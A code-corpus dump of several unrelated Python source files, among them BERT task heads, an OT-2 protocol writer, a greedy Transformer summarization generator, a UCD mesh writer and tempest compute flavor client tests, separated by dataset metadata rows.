    """Bert Model with a multiple choice classification head on top (a linear layer on top of
    the pooled output and a softmax) e.g. for RocStories/SWAG tasks. """,
    BERT_START_DOCSTRING,
)
class BertForMultipleChoice(BertPreTrainedModel):
    """BERT with a single-logit-per-choice head for multiple-choice tasks."""

    def __init__(self, config):
        super().__init__(config)
        self.bert = BertModel(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.classifier = nn.Linear(config.hidden_size, 1)
        self.init_weights()

    @add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, num_choices, sequence_length)"))
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
            Labels for computing the multiple choice classification loss.
            Indices should be in ``[0, ..., num_choices-1]`` where `num_choices` is the size of the
            second dimension of the input tensors (see `input_ids` above).

    Returns:
        :obj:`tuple(torch.FloatTensor)`:
            ``(loss,)`` when :obj:`labels` is provided, followed by ``classification_scores``
            of shape :obj:`(batch_size, num_choices)` and the optional hidden states /
            attentions from the base model.

        Examples::

            from transformers import BertTokenizer, BertForMultipleChoice
            import torch

            tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
            model = BertForMultipleChoice.from_pretrained('bert-base-uncased')
            prompt = "In Italy, pizza served in formal settings, such as at a restaurant, is presented unsliced."
            choice0 = "It is eaten with a fork and a knife."
            choice1 = "It is eaten while held in the hand."
            labels = torch.tensor(0).unsqueeze(0)  # choice0 is correct, batch size 1
            encoding = tokenizer.batch_encode_plus([[prompt, choice0], [prompt, choice1]], return_tensors='pt', pad_to_max_length=True)
            outputs = model(**{k: v.unsqueeze(0) for k, v in encoding.items()}, labels=labels)  # batch size is 1
            loss, logits = outputs[:2]
        """
        num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1]

        def squash(tensor):
            # Merge batch and choice dims: (batch, choices, seq) -> (batch * choices, seq).
            return None if tensor is None else tensor.view(-1, tensor.size(-1))

        # Embeddings keep their trailing hidden dimension when flattened.
        flat_embeds = (
            None
            if inputs_embeds is None
            else inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1))
        )

        bert_outputs = self.bert(
            squash(input_ids),
            attention_mask=squash(attention_mask),
            token_type_ids=squash(token_type_ids),
            position_ids=squash(position_ids),
            head_mask=head_mask,
            inputs_embeds=flat_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
        )

        # One score per flattened (example, choice) pair, then unflatten.
        choice_scores = self.classifier(self.dropout(bert_outputs[1]))
        reshaped_logits = choice_scores.view(-1, num_choices)

        outputs = (reshaped_logits,) + bert_outputs[2:]  # keep hidden states / attentions
        if labels is None:
            return outputs

        loss = CrossEntropyLoss()(reshaped_logits, labels)
        return (loss,) + outputs  # (loss), reshaped_logits, (hidden_states), (attentions)
@add_start_docstrings(
    """Bert Model with a token classification head on top (a linear layer on top of
    the hidden-states output) e.g. for Named-Entity-Recognition (NER) tasks. """,
    BERT_START_DOCSTRING,
)
class BertForTokenClassification(BertPreTrainedModel):
    """BERT with a per-token linear classification head (e.g. for NER)."""

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.bert = BertModel(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.classifier = nn.Linear(config.hidden_size, config.num_labels)
        self.init_weights()

    @add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
            Labels for computing the token classification loss.
            Indices should be in ``[0, ..., config.num_labels - 1]``.

    Returns:
        :obj:`tuple(torch.FloatTensor)`:
            ``(loss,)`` when :obj:`labels` is provided, followed by ``scores`` of shape
            :obj:`(batch_size, sequence_length, config.num_labels)` and the optional
            hidden states / attentions from the base model.

        Examples::

            from transformers import BertTokenizer, BertForTokenClassification
            import torch

            tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
            model = BertForTokenClassification.from_pretrained('bert-base-uncased')
            input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0)
            labels = torch.tensor([1] * input_ids.size(1)).unsqueeze(0)
            outputs = model(input_ids, labels=labels)
            loss, scores = outputs[:2]
        """
        encoder_outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
        )

        # One logit vector per token, computed from the last hidden states.
        token_logits = self.classifier(self.dropout(encoder_outputs[0]))

        outputs = (token_logits,) + encoder_outputs[2:]  # keep hidden states / attentions
        if labels is None:
            return outputs

        loss_fct = CrossEntropyLoss()
        flat_logits = token_logits.view(-1, self.num_labels)
        flat_labels = labels.view(-1)
        if attention_mask is not None:
            # Masked-out (padding) positions receive the ignore_index so they
            # contribute nothing to the loss.
            keep = attention_mask.view(-1) == 1
            flat_labels = torch.where(
                keep, flat_labels, torch.tensor(loss_fct.ignore_index).type_as(labels)
            )
        loss = loss_fct(flat_logits, flat_labels)
        return (loss,) + outputs  # (loss), scores, (hidden_states), (attentions)
@add_start_docstrings(
    """Bert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
    layers on top of the hidden-states output to compute `span start logits` and `span end logits`). """,
    BERT_START_DOCSTRING,
)
class BertForQuestionAnswering(BertPreTrainedModel):
    """BERT with a span-extraction head (start/end logits) for SQuAD-style QA."""

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.bert = BertModel(config)
        # Projects each token's hidden state to (start_logit, end_logit).
        self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels)
        self.init_weights()

    @add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        start_positions=None,
        end_positions=None,
        output_attentions=None,
        output_hidden_states=None,
    ):
        r"""
        start_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
            Labels for position (index) of the start of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`).
            Positions outside of the sequence are not taken into account for computing the loss.
        end_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
            Labels for position (index) of the end of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`).
            Positions outside of the sequence are not taken into account for computing the loss.

    Returns:
        :obj:`tuple(torch.FloatTensor)`:
            ``(loss,)`` when both :obj:`start_positions` and :obj:`end_positions` are provided,
            followed by ``start_scores`` and ``end_scores``, each of shape
            :obj:`(batch_size, sequence_length)`, and the optional hidden states / attentions
            from the base model.

        Examples::

            from transformers import BertTokenizer, BertForQuestionAnswering
            import torch

            tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
            model = BertForQuestionAnswering.from_pretrained('bert-large-uncased-whole-word-masking-finetuned-squad')
            question, text = "Who was Jim Henson?", "Jim Henson was a nice puppet"
            encoding = tokenizer.encode_plus(question, text)
            input_ids, token_type_ids = encoding["input_ids"], encoding["token_type_ids"]
            start_scores, end_scores = model(torch.tensor([input_ids]), token_type_ids=torch.tensor([token_type_ids]))
            all_tokens = tokenizer.convert_ids_to_tokens(input_ids)
            answer = ' '.join(all_tokens[torch.argmax(start_scores) : torch.argmax(end_scores)+1])
            assert answer == "a nice puppet"
        """
        # NOTE: this method previously contained leftover debug print() calls
        # (with mojibake characters) that spammed stdout on every forward pass;
        # they have been removed.
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
        )
        sequence_output = outputs[0]

        # (batch, seq_len, 2) -> two (batch, seq_len) tensors of start/end scores.
        logits = self.qa_outputs(sequence_output)
        start_logits, end_logits = logits.split(1, dim=-1)
        start_logits = start_logits.squeeze(-1)
        end_logits = end_logits.squeeze(-1)

        outputs = (start_logits, end_logits,) + outputs[2:]
        if start_positions is not None and end_positions is not None:
            # If we are on multi-GPU, split adds a dimension.
            if len(start_positions.size()) > 1:
                start_positions = start_positions.squeeze(-1)
            if len(end_positions.size()) > 1:
                end_positions = end_positions.squeeze(-1)
            # Sometimes the start/end positions are outside our model inputs;
            # clamp them to the sentinel index so the loss ignores those terms.
            ignored_index = start_logits.size(1)
            start_positions.clamp_(0, ignored_index)
            end_positions.clamp_(0, ignored_index)

            loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
            start_loss = loss_fct(start_logits, start_positions)
            end_loss = loss_fct(end_logits, end_positions)
            total_loss = (start_loss + end_loss) / 2
            outputs = (total_loss,) + outputs

        return outputs  # (loss), start_logits, end_logits, (hidden_states), (attentions)
| 45.792419 | 168 | 0.667915 |
795afad6321eca85934937015fb6489c33779863 | 156 | py | Python | scripts/analysis/dependencies/fq_names_types.py | JetBrains-Research/Lupa | c105487621564c60cae17395bf32eb40868ceb89 | [
"Apache-2.0"
] | 16 | 2022-01-11T00:32:20.000Z | 2022-03-25T21:40:52.000Z | scripts/analysis/dependencies/fq_names_types.py | JetBrains-Research/Lupa | c105487621564c60cae17395bf32eb40868ceb89 | [
"Apache-2.0"
] | 5 | 2022-01-11T09:36:52.000Z | 2022-03-14T10:24:31.000Z | scripts/analysis/dependencies/fq_names_types.py | JetBrains-Research/Lupa | c105487621564c60cae17395bf32eb40868ceb89 | [
"Apache-2.0"
] | 2 | 2022-03-07T20:08:56.000Z | 2022-03-25T21:40:56.000Z | from typing import Dict, List, Union
FqNamesDict = Dict[str, Union['FqNamesDict', int]]
FqNamesStats = Dict[str, int]
FqNamesGroups = Dict[str, List[str]]
| 26 | 50 | 0.737179 |
795afd29d15badcf802a70c2760f1fd46133c72e | 2,171 | py | Python | ot2_protocol_generator/protocol_writer.py | olichen/liquidhandler | 6470e96432f885e7faac7afc4fd34b88feb9cae1 | [
"MIT"
] | null | null | null | ot2_protocol_generator/protocol_writer.py | olichen/liquidhandler | 6470e96432f885e7faac7afc4fd34b88feb9cae1 | [
"MIT"
] | null | null | null | ot2_protocol_generator/protocol_writer.py | olichen/liquidhandler | 6470e96432f885e7faac7afc4fd34b88feb9cae1 | [
"MIT"
] | null | null | null | from .helpers import format_helper
from .helpers import csv_helper
# Class that handles receiving/validating data and outputting the protocol
class ProtocolWriter:
    """Collects pipette and plate definitions (plus transfer CSVs) and writes
    an OT-2 protocol file.

    Pipette data must be added (via :meth:`addData`) before any plate data,
    because plate CSV validation depends on the pipette type.
    """

    def __init__(self):
        self._pipette_data = None      # single pipette definition, set by addData
        self._plate_data = []          # one entry per plate pair
        self._plate_csv = []           # parallel list of per-plate transfer volumes
        self._fh = format_helper.FormatHelper()

    # Add another source of data (either pipette or plate data)
    def addData(self, data):
        """Register a pipette or plate definition.

        Raises:
            ValueError: if plate data arrives before any pipette data has been
                added (validation needs the pipette type).
        """
        if data.data_type == 'pipette':
            self._pipette_data = data
        elif data.data_type == 'plate':
            # Previously this dereferenced a possibly-None pipette; fail with a
            # clear message instead of an AttributeError.
            if self._pipette_data is None:
                raise ValueError('Pipette data must be added before plate data')
            self._plate_data.append(data)
            # Add csv data. Validate multi-head transfer data.
            # (The CSV handling belongs to the plate branch only: it was
            # previously executed for pipette data as well, which would have
            # misaligned _plate_csv with _plate_data.)
            csv_data = csv_helper.CSVReader(data.csv_file_loc)
            if self._pipette_data.isMulti():
                csv_data.validate_multi_transfer()
            self._plate_csv.append(csv_data.volumes)

    # Open the output file and write everything
    def saveOutput(self, output_file):
        """Write the complete protocol (header, racks, pipette, transfers)."""
        with open(output_file, 'w') as f:
            f.write(self._fh.header())
            self._output_tip_racks(f)
            self._output__pipette_data(f)
            self._output_transfer_data(f)

    # Iterate through all the input data and write the tip rack definitions
    def _output_tip_racks(self, f):
        for d in self._plate_data:
            f.write(self._fh.tip_rack(d.tip_rack_name, d.tip_rack_loc))

    # Write the pipette definition
    def _output__pipette_data(self, f):
        d = self._pipette_data
        f.write(self._fh.pipette(d.pipette_name, d.pipette_loc))

    # Iterate through all the input data and write the plate definitions
    # followed by all the transfers
    def _output_transfer_data(self, f):
        for d, csv in zip(self._plate_data, self._plate_csv):
            f.write(self._fh.src_plate(d.src_plate_name, d.src_plate_loc))
            f.write(self._fh.dest_plate(d.dest_plate_name, d.dest_plate_loc))
            if self._pipette_data.isMulti():
                # A multi-channel head transfers a whole 8-well column at once,
                # so only every 8th well's volume is emitted. Using len(csv)
                # instead of a hard-coded 96 keeps the old behaviour for
                # 96-well plates while supporting other plate sizes.
                for i in range(0, len(csv), 8):
                    f.write(self._fh.transfer(csv[i], i))
            else:
                for i, vol in enumerate(csv):
                    f.write(self._fh.transfer(vol, i))
| 38.087719 | 77 | 0.637955 |
795afdb328f251bd5423e25313fe8f3b2318c9c5 | 5,646 | py | Python | Birnn_Transformer/ncc/eval/summarization/transformer_generator.py | code-backdoor/code-backdoor | 1eeb3d79aa8a54c8f08e8d0156b569de5edd974e | [
"MIT"
] | 71 | 2020-12-04T02:18:13.000Z | 2022-03-30T15:19:50.000Z | Birnn_Transformer/ncc/eval/summarization/transformer_generator.py | code-backdoor/code-backdoor | 1eeb3d79aa8a54c8f08e8d0156b569de5edd974e | [
"MIT"
] | 4 | 2021-03-10T17:48:50.000Z | 2022-03-13T10:42:22.000Z | Birnn_Transformer/ncc/eval/summarization/transformer_generator.py | code-backdoor/code-backdoor | 1eeb3d79aa8a54c8f08e8d0156b569de5edd974e | [
"MIT"
] | 11 | 2020-12-09T12:17:44.000Z | 2022-03-30T09:02:13.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
from ncc.utils import utils
import torch.nn.functional as F
from torch import Tensor
from typing import Optional, List, Dict
class TransformerGenerator(object):
    """Sequence generator for Transformer summarization models.

    NOTE(review): despite the ``beam_size`` parameter, :meth:`generate`
    below performs plain greedy (argmax) decoding. Several constructor
    options (beam size, penalties, ``no_repeat_ngram_size``) are stored
    but never consulted by the decoding loop.
    """
    def __init__(
        self,
        tgt_dict,
        beam_size=1,
        max_len_a=0,
        max_len_b=200,
        min_len=1,
        normalize_scores=True,
        len_penalty=1.,
        unk_penalty=0.,
        retain_dropout=False,
        temperature=1.,
        match_source_len=False,
        no_repeat_ngram_size=0,
        eos=None
    ):
        """Generates translations of a given source sentence.
        Args:
            tgt_dict (~fairseq.data.Dictionary): target dictionary
            beam_size (int, optional): beam width (default: 1)
            max_len_a/b (int, optional): generate sequences of maximum length
                ax + b, where x is the source length
            min_len (int, optional): the minimum length of the generated output
                (not including end-of-sentence)
            normalize_scores (bool, optional): normalize scores by the length
                of the output (default: True)
            len_penalty (float, optional): length penalty, where <1.0 favors
                shorter, >1.0 favors longer sentences (default: 1.0)
            unk_penalty (float, optional): unknown word penalty, where <0
                produces more unks, >0 produces fewer (default: 0.0)
            retain_dropout (bool, optional): use dropout when generating
                (default: False)
            temperature (float, optional): temperature, where values
                >1.0 produce more uniform samples and values <1.0 produce
                sharper samples (default: 1.0)
            match_source_len (bool, optional): outputs should match the source
                length (default: False)
        """
        # Cache special-token indices from the target dictionary.
        self.pad = tgt_dict.pad()
        self.unk = tgt_dict.unk()
        self.bos = tgt_dict.bos()
        self.eos = tgt_dict.eos() if eos is None else eos
        self.vocab_size = len(tgt_dict)
        self.beam_size = beam_size
        # the max beam size is the dictionary size - 1, since we never select pad
        self.beam_size = min(beam_size, self.vocab_size - 1)
        self.max_len_a = max_len_a
        self.max_len_b = max_len_b
        self.min_len = min_len
        self.normalize_scores = normalize_scores
        self.len_penalty = len_penalty
        self.unk_penalty = unk_penalty
        self.retain_dropout = retain_dropout
        self.temperature = temperature
        self.match_source_len = match_source_len
        self.no_repeat_ngram_size = no_repeat_ngram_size
        assert temperature > 0, '--temperature must be greater than 0'
    @torch.no_grad()
    def generate(self, models, sample, **kwargs):
        """Generate a batch of translations.
        Args:
            models (List[~fairseq.models.NccModel]): ensemble of models
            sample (dict): batch
            prefix_tokens (torch.LongTensor, optional): force decoder to begin
                with these tokens
            bos_token (int, optional): beginning of sentence token
                (default: self.eos)
        """
        # Only the first model of the ensemble is actually used here.
        model = models[0]  # for ensemble expansion
        # Disable dropout for deterministic generation unless told otherwise.
        if not self.retain_dropout:
            model.eval()
        src_tokens = sample['net_input']['src_tokens']
        # Source lengths recomputed from the padding mask.
        src_lengths = (src_tokens != self.pad).int().sum(-1)
        bsz, src_len = src_tokens.size()
        device = src_tokens.device
        if self.match_source_len:
            max_len = src_lengths.max().item()
        else:
            max_len = min(
                int(self.max_len_a * src_len + self.max_len_b),
                # exclude the EOS marker
                model.max_decoder_positions() - 1,
            )
        assert self.min_len <= max_len, 'min_len cannot be larger than max_len, please adjust these!'
        # 1. encode the source once; the decoder attends to this every step.
        encoder_out = model.encoder(sample['net_input']['src_tokens'], src_lengths=sample['net_input']['src_lengths'])
        # Decoding starts from a single BOS token per batch element.
        prev_output_tokens = torch.zeros(bsz, 1).long().fill_(self.bos).to(device)
        # prev_output_tokens = torch.zeros(bsz, 1).long().fill_(self.eos).to(device)
        dec_preds = []
        # 2. generate
        from collections import OrderedDict
        # incremental_state caches per-step decoder key/value projections so
        # each iteration only computes attention for the newest token.
        incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = OrderedDict()
        full_context_alignment: bool = False
        alignment_layer: Optional[int] = None
        alignment_heads: Optional[int] = None
        # Autoregressive loop: feed all tokens generated so far, take the
        # distribution for the last position, and append the chosen token.
        for j in range(max_len + 1):
            # incremental_state['step'] = j
            decoder_outputs, attns = model.decoder(prev_output_tokens, encoder_out=encoder_out, \
                                                   incremental_state=incremental_state)
            prediction = decoder_outputs.squeeze(1)
            prediction = prediction.log_softmax(dim=1)
            # sample_max is hard-coded True, so decoding is greedy (argmax);
            # the multinomial sampling branch below is effectively dead code.
            sample_max = True
            if sample_max:
                sample_logprobs, predicted = torch.max(prediction, dim=-1, keepdim=True)
            else:
                predicted = torch.multinomial(prediction, 1)  # .to(device)
            dec_preds.append(predicted.squeeze(1).clone())
            prev_output_tokens = torch.cat((prev_output_tokens, predicted), dim=-1)
        # Stack per-step predictions into (batch, max_len + 1).
        dec_preds = torch.stack(dec_preds, dim=1)
        # Wrap each hypothesis in the [{'tokens': ...}] structure callers expect.
        # NOTE(review): generation does not stop early at EOS — sequences always
        # run to max_len; downstream consumers presumably truncate at EOS.
        predictions = []
        for pred in dec_preds.tolist():
            predictions.append([{'tokens': torch.Tensor(pred).type_as(dec_preds)}])
        return predictions
| 40.042553 | 118 | 0.613355 |
795afee0ea7eb79a7f70753fe3da8eea5d3a87cc | 5,510 | py | Python | femio/formats/ucd/write_ucd.py | yellowshippo/femio | dde277136a8a1b2513afa85ae2fb8707858aa04a | [
"Apache-2.0"
] | 1 | 2021-05-25T16:29:09.000Z | 2021-05-25T16:29:09.000Z | femio/formats/ucd/write_ucd.py | yellowshippo/femio | dde277136a8a1b2513afa85ae2fb8707858aa04a | [
"Apache-2.0"
] | null | null | null | femio/formats/ucd/write_ucd.py | yellowshippo/femio | dde277136a8a1b2513afa85ae2fb8707858aa04a | [
"Apache-2.0"
] | null | null | null |
import numpy as np
import pandas as pd
class UCDWriter():
    """Writes a FEMData object out in AVS UCD ASCII (.inp) format.

    The UCD layout emitted here: a counts header line, node coordinates,
    element connectivity, then optional node-data and cell-data sections.
    """
    def __init__(self, fem_data):
        # FEMData instance providing nodes, elements, nodal_data and
        # elemental_data collections.
        self.fem_data = fem_data
    def write(self, file_name=None, *, overwrite=False):
        """Write FEM data in inp format.
        Args:
            fem_data: FEMData object to be output.
            file_name: File name of the output file. If not fed,
                input_filename.out.ext will be the output file name.
            overwrite: Bool, if True, allow overwrite files (Default: False.)
        NOTE(review): ``overwrite`` is accepted but never checked in this
        method, and ``file_name=None`` would make ``open`` fail — the
        default-name behavior described above is not implemented here.
        """
        n_node = len(self.fem_data.nodes.ids)
        n_element = len(self.fem_data.elements.ids)
        # NOTE: So far write only non time series data whose shape == 2
        # Keep only 2-D, non-object-dtype nodal arrays (one row per node).
        nodal_data_dict_2d = {
            key: value
            for key, value in self.fem_data.nodal_data.items()
            if len(value.data.shape) == 2
            and self._extract_dtype(value.data) != np.dtype('O')}
        nodal_data_dimensions = [
            v.data.shape[1] for v in nodal_data_dict_2d.values()]
        # Elemental data may hold object arrays; convert them to plain
        # ndarrays first and keep only those that end up 2-D.
        elemental_data_dict_2d = self._convert_objectdict2arraydict(
            self.fem_data.elemental_data)
        elemental_data_dimensions = [
            v.data.shape[1] for v in elemental_data_dict_2d.values()]
        with open(file_name, 'w') as f:
            # Header: node count, cell count, total node-data components,
            # total cell-data components, and 0 model-data components.
            f.write(
                f"{n_node} {n_element} {int(np.sum(nodal_data_dimensions))}"
                f" {int(np.sum(elemental_data_dimensions))} 0\n")
            # Node
            f.write(pd.DataFrame(
                index=self.fem_data.nodes.ids, data=self.fem_data.nodes.data
            ).to_csv(sep=' ', header=False, na_rep='NaN'))
            # Element
            for element_type in self.fem_data.elements.ELEMENT_TYPES:
                if element_type not in self.fem_data.elements:
                    continue
                element = self.fem_data.elements[element_type]
                # NOTE(review): this reassignment shadows the total element
                # count computed above; harmless here since the header was
                # already written, but confusing.
                n_element = len(element.ids)
                # Second-order elements are downgraded to first order for UCD.
                first_element, first_element_type = \
                    self._extract_first_order_element(element, element_type)
                # Each row: element id, material id (fixed 1), type name,
                # then the node connectivity.
                f.write(pd.DataFrame(
                    index=element.ids,
                    data=np.concatenate([
                        np.ones([n_element, 1], dtype=int),
                        np.array([[first_element_type] * n_element]).T,
                        first_element
                    ], axis=1)
                ).to_csv(sep=' ', header=False, na_rep='NaN'))
            # Nodal data
            n_nodal_data = len(nodal_data_dict_2d)
            if n_nodal_data > 0:
                # Component count line, then one "label, unit" line per
                # component, then one row of values per node.
                f.write(f"{n_nodal_data} " + ' '.join(
                    str(d) for d in nodal_data_dimensions) + '\n')
                f.write(
                    '\n'.join(
                        f"{k}, unit_unknown" for k
                        in nodal_data_dict_2d.keys()) + '\n')
                f.write(pd.DataFrame(
                    index=self.fem_data.nodes.ids,
                    data=np.concatenate([
                        v.data for v
                        in nodal_data_dict_2d.values()], axis=1)
                ).to_csv(sep=' ', header=False, na_rep='NaN'))
            # Elemental data
            n_elemental_data = len(elemental_data_dict_2d)
            if len(elemental_data_dict_2d) > 0:
                # Same structure as the nodal-data section, keyed by element id.
                f.write(f"{n_elemental_data} " + ' '.join(
                    str(d) for d in elemental_data_dimensions) + '\n')
                f.write(
                    '\n'.join(
                        f"{k}, unit_unknown" for k
                        in elemental_data_dict_2d.keys()) + '\n')
                f.write(pd.DataFrame(
                    index=self.fem_data.elements.ids,
                    data=np.concatenate([
                        v.data for v
                        in elemental_data_dict_2d.values()
                        if len(v.data.shape) == 2], axis=1)
                ).to_csv(sep=' ', header=False, na_rep='NaN'))
        return file_name
    def _convert_objectdict2arraydict(self, object_dict):
        # Convert each entry's data with _convert_object2array and keep only
        # results that are 2-D (the only shape the writer supports).
        return_dict = {}
        for key, value in object_dict.items():
            converted_value = self._convert_object2array(value.data)
            if len(converted_value.shape) == 2:
                return_dict.update({key: converted_value})
        return return_dict
    def _convert_object2array(self, objectarray):
        # Turn a 2-D object-dtype array whose cells are themselves arrays
        # into one dense ndarray; anything else is returned unchanged.
        if objectarray.dtype != np.dtype('O'):
            return objectarray
        if hasattr(objectarray[0, 0], 'dtype'):
            original_dtype = objectarray[0, 0].dtype
        else:
            # Cells are not array-like; nothing sensible to convert.
            return objectarray
        row, col = objectarray.shape
        feature = objectarray[0, 0]
        stripped = np.stack([
            d.astype(original_dtype) for d in np.ravel(objectarray)])
        if len(feature.shape) == 0:
            # Scalar cells: result keeps the (row, col) shape.
            return np.reshape(stripped, (row, col))
        else:
            # Array cells: append their shape as trailing dimensions.
            return np.reshape(stripped, [row, col] + list(feature.shape))
    def _extract_dtype(self, array):
        # dtype of an ndarray, or the Python type for non-array values.
        if hasattr(array, 'dtype'):
            dtype = array.dtype
        else:
            dtype = type(array)
        return dtype
    def _extract_first_order_element(self, element, element_type):
        # Return (connectivity, type name) with second-order ('*2') elements
        # reduced to their first-order equivalent. Only 'tet2' is supported:
        # its first four nodes are the corner nodes of a 'tet'.
        if element_type[-1] != '2':
            return element.data, element_type
        else:
            if element_type == 'tet2':
                element = element.data[:, :4]
            else:
                raise ValueError(
                    f"Unknown element type: {element_type}")
            return element, element_type[:-1]
| 38.531469 | 77 | 0.53049 |
795aff74465344c510292aec5f6ff64d6ea91df4 | 9,608 | py | Python | tempest/tests/lib/services/compute/test_flavors_client.py | paulaCrismaru/lis-tempest | 4f142db3967971ee42c4fcff01be363bbdc4bc54 | [
"Apache-2.0"
] | 3 | 2016-07-15T12:27:23.000Z | 2021-04-23T04:41:10.000Z | tempest/tests/lib/services/compute/test_flavors_client.py | LIS/lis-tempest | 8e6403b2d6de81c5d18ed867b4977385c8278b75 | [
"Apache-2.0"
] | null | null | null | tempest/tests/lib/services/compute/test_flavors_client.py | LIS/lis-tempest | 8e6403b2d6de81c5d18ed867b4977385c8278b75 | [
"Apache-2.0"
] | 12 | 2016-07-14T18:13:05.000Z | 2017-07-08T18:45:42.000Z | # Copyright 2015 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import httplib2
from oslo_serialization import jsonutils as json
from oslotest import mockpatch
from tempest.lib.services.compute import flavors_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services.compute import base
class TestFlavorsClient(base.BaseComputeServiceTest):
    """Unit tests for FlavorsClient.

    Each ``_test_*`` helper mocks one RestClient HTTP method, invokes the
    corresponding client call, and checks that the client returns the
    expected (fake) payload; each helper is exercised twice, once with a
    str response body and once with a bytes response body.
    """
    # Canonical fake flavor payload reused across tests.
    FAKE_FLAVOR = {
        "disk": 1,
        "id": "1",
        "links": [{
            "href": "http://openstack.example.com/v2/openstack/flavors/1",
            "rel": "self"}, {
            "href": "http://openstack.example.com/openstack/flavors/1",
            "rel": "bookmark"}],
        "name": "m1.tiny",
        "ram": 512,
        "swap": 1,
        "vcpus": 1
    }
    EXTRA_SPECS = {"extra_specs": {
        "key1": "value1",
        "key2": "value2"}
    }
    FAKE_FLAVOR_ACCESS = {
        "flavor_id": "10",
        "tenant_id": "1a951d988e264818afe520e78697dcbf"
    }
    def setUp(self):
        super(TestFlavorsClient, self).setUp()
        fake_auth = fake_auth_provider.FakeAuthProvider()
        self.client = flavors_client.FlavorsClient(fake_auth,
                                                   'compute', 'regionOne')
    def _test_list_flavors(self, bytes_body=False):
        flavor = copy.deepcopy(TestFlavorsClient.FAKE_FLAVOR)
        # Remove extra attributes
        # (the non-detailed flavor listing omits disk/vcpus/ram/swap)
        for attribute in ('disk', 'vcpus', 'ram', 'swap'):
            del flavor[attribute]
        expected = {'flavors': [flavor]}
        self.check_service_client_function(
            self.client.list_flavors,
            'tempest.lib.common.rest_client.RestClient.get',
            expected,
            bytes_body)
    def test_list_flavors_str_body(self):
        self._test_list_flavors(bytes_body=False)
    def test_list_flavors_byte_body(self):
        self._test_list_flavors(bytes_body=True)
    def _test_show_flavor(self, bytes_body=False):
        expected = {"flavor": TestFlavorsClient.FAKE_FLAVOR}
        self.check_service_client_function(
            self.client.show_flavor,
            'tempest.lib.common.rest_client.RestClient.get',
            expected,
            bytes_body,
            flavor_id='fake-id')
    def test_show_flavor_str_body(self):
        self._test_show_flavor(bytes_body=False)
    def test_show_flavor_byte_body(self):
        self._test_show_flavor(bytes_body=True)
    def _test_create_flavor(self, bytes_body=False):
        expected = {"flavor": TestFlavorsClient.FAKE_FLAVOR}
        request = copy.deepcopy(TestFlavorsClient.FAKE_FLAVOR)
        # The 'links' parameter should not be passed in
        del request['links']
        self.check_service_client_function(
            self.client.create_flavor,
            'tempest.lib.common.rest_client.RestClient.post',
            expected,
            bytes_body,
            **request)
    def test_create_flavor_str_body(self):
        self._test_create_flavor(bytes_body=False)
    def test_create_flavor__byte_body(self):
        self._test_create_flavor(bytes_body=True)
    def test_delete_flavor(self):
        self.check_service_client_function(
            self.client.delete_flavor,
            'tempest.lib.common.rest_client.RestClient.delete',
            {}, status=202, flavor_id='c782b7a9-33cd-45f0-b795-7f87f456408b')
    def _test_is_resource_deleted(self, flavor_id, is_deleted=True,
                                  bytes_body=False):
        # is_resource_deleted lists flavors and reports True only when the
        # given id is absent; FAKE_FLAVOR has id '1', so '2' counts as deleted.
        body = json.dumps({'flavors': [TestFlavorsClient.FAKE_FLAVOR]})
        if bytes_body:
            body = body.encode('utf-8')
        response = (httplib2.Response({'status': 200}), body)
        self.useFixture(mockpatch.Patch(
